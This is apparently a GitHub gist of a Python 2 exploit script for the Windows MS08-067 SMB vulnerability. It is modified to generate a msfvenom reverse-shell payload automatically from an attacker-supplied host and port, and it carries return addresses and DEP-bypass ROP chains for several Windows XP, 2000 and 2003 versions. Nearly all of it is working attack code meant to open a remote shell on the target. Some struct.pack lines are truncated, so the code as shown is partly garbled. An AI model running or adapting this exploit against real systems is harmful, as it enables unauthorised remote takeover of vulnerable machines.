/ms08-067-fixed.py
Created last year
Updated ms08-67 exploit without custom netcat listener.
| #!/usr/bin/python |
| ############################################################################################### |
| # MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 # |
| # Designed for Kali Linux - msfvenom and nc required to function # |
| # Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ # |
| # Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). # |
| # The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi # |
| ############################################################################################### |
| import struct |
| import time |
| import sys |
| import subprocess # Added to integrate msfvenom payload generation functionality |
| from threading import Thread #Thread is imported incase you would like to modify |
| try: |
| from impacket import smb |
| from impacket import uuid |
| from impacket import dcerpc |
| from impacket.dcerpc.v5 import transport |
| except ImportError, _: |
| print 'Install the following library to make this script work' |
| print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' |
| print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' |
| sys.exit(1) |
| if __name__ == '__main__': |
| try: |
| target = sys.argv[1] |
| os = sys.argv[2] |
| lhost = sys.argv[3] |
| lport = sys.argv[4] |
| except IndexError: |
| print '' |
| print ' ____________________________________________' |
| print ' | |' |
| print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
| print ' | Based On Ported MSF Exploit By EKOZ |' |
| print ' |____________________________________________|' |
| print ' | |' |
| print ' | USAGE |' |
| print ' | MS08-067.py |
| print ' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |' |
| print ' |____________________________________________|' |
| print ' | |' |
| print ' | TARGET OS SELECTION |' |
| print ' | 1 = Windows XP SP0/SP1 Universal |' |
| print ' | 2 = Windows 2000 Universal |' |
| print ' | 3 = Windows 2003 SP0 Universal |' |
| print ' | 4 = Windows 2003 SP1 English |' |
| print ' | 5 = Windows XP SP3 French (NX) |' |
| print ' | 6 = Windows XP SP3 English (NX) |' |
| print ' | 7 = Windows XP SP3 English (AlwaysOn NX) |' |
| print ' |____________________________________________|\r\n' |
| print ' I suggest you use a stageless payload to avoid issues with the handler.' |
| sys.exit(-1) |
| #badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40; |
| #Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes |
| #EXITFUNC=thread Important! |
| # msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python |
| # Auto Generate Reverse Shell Payload Using msfvenom |
| mksh = "msfvenom -p windows/shell_reverse_tcp" |
| mksh += " -b \'\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\'" |
| mksh += " -e x86/call4_dword_xor" |
| mksh += " EXITFUNC=thread" |
| mksh += " --nopsled=32" |
| mksh += " LHOST="+lhost |
| mksh += " LPORT="+lport |
| mksh += " -f python " |
| mksh += " -a x86" |
| mksh += " -o RevPld.py" |
| print ' ____________________________________________' |
| print ' | |' |
| print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
| print ' | Based On Ported MSF Exploit By EKOZ |' |
| print ' |____________________________________________|\r\n' |
| try: |
| print "[+] Attempting To Generate Reverse Shell Payload ..." |
| vnm = subprocess.Popen(mksh.split(), stdout=subprocess.PIPE) |
| vnm.wait() |
| print "[+] Reverse Shell Payload Generated Successfully..." |
| except: |
| print "[!] ERROR: Couldn't Generate Payload " |
| sys.exit(-1) |
| from RevPld import buf |
| nops = "\x90"*30 |
| nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10 |
| disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62" |
| ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01"; |
| module_base = 0x6f880000 |
| def generate_rop(rvas): |
| gadget1="\x90\x5a\x59\xc3" |
| gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] |
| gadget3="\xcc\x90\xeb\x5a" |
| ret=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget1 |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget2[0] |
| ret+=gadget2[1] |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget2[2] |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget3 |
| return ret |
| class SRVSVC_Exploit(Thread): |
| def __init__(self, target, os, port=445): |
| super(SRVSVC_Exploit, self).__init__() |
| self.__port = port |
| self.target = target |
| self.os = os |
| def __DCEPacket(self): |
| if (self.os=='1'): |
| print '[+] Targeting : Windows XP SP0/SP1 Universal' |
| ret = "\x61\x13\x00\x01" |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='2'): |
| print '[+] Targeting : Windows 2000 Universal' |
| ret = "\xb0\x1c\x1f\x00" |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='3'): |
| print '[+] Targeting : Windows 2003 SP0 Universal' |
| ret = "\x9e\x12\x00\x01" #0x01 00 12 9e |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='4'): |
| print '[+] Targeting : Windows 2003 SP1 English' |
| ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL |
| ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL |
| jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL |
| disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL |
| jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2) |
| elif (self.os=='5'): |
| print '[+] Targeting : Windows XP SP3 French (NX)' |
| ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07 |
| disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 |
| jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
| elif (self.os=='6'): |
| print '[+] Targeting : Windows XP SP3 English (NX)' |
| ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07 |
| disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 |
| jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
| elif (self.os=='7'): |
| print '[+] Targeting : Windows XP SP3 English (AlwaysOn NX)' |
| rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64} |
| jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case. |
| else: |
| print '[+] OS Version Not Supported\n' |
| sys.exit(-1) |
| print '[+] Initiating Connection To '+target+":445" |
| self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) |
| self.__trans.connect() |
| self.__dce = self.__trans.DCERPC_class(self.__trans) |
| self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) |
| path ="\x5c\x00"+"ABCDEFGHIJ"*10 + nops + buf +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" |
| path += "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 |
| server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" |
| prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" |
| self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00" |
| return |
| def run(self): |
| self.__DCEPacket() |
| self.__dce.call(0x1f, self.__stub) |
| current = SRVSVC_Exploit(target, os) |
| current.start() |
| print "Now start up a multi/handler with your payload options set to: " |
| print "payload windows/shell_reverse_tcp" # seems to be the most stable and consistent. |
| print "LHOST ", lhost |
| print "LPORT ", lport |
to join this conversation on GitHub.
Already have an account?
Sign in to comment
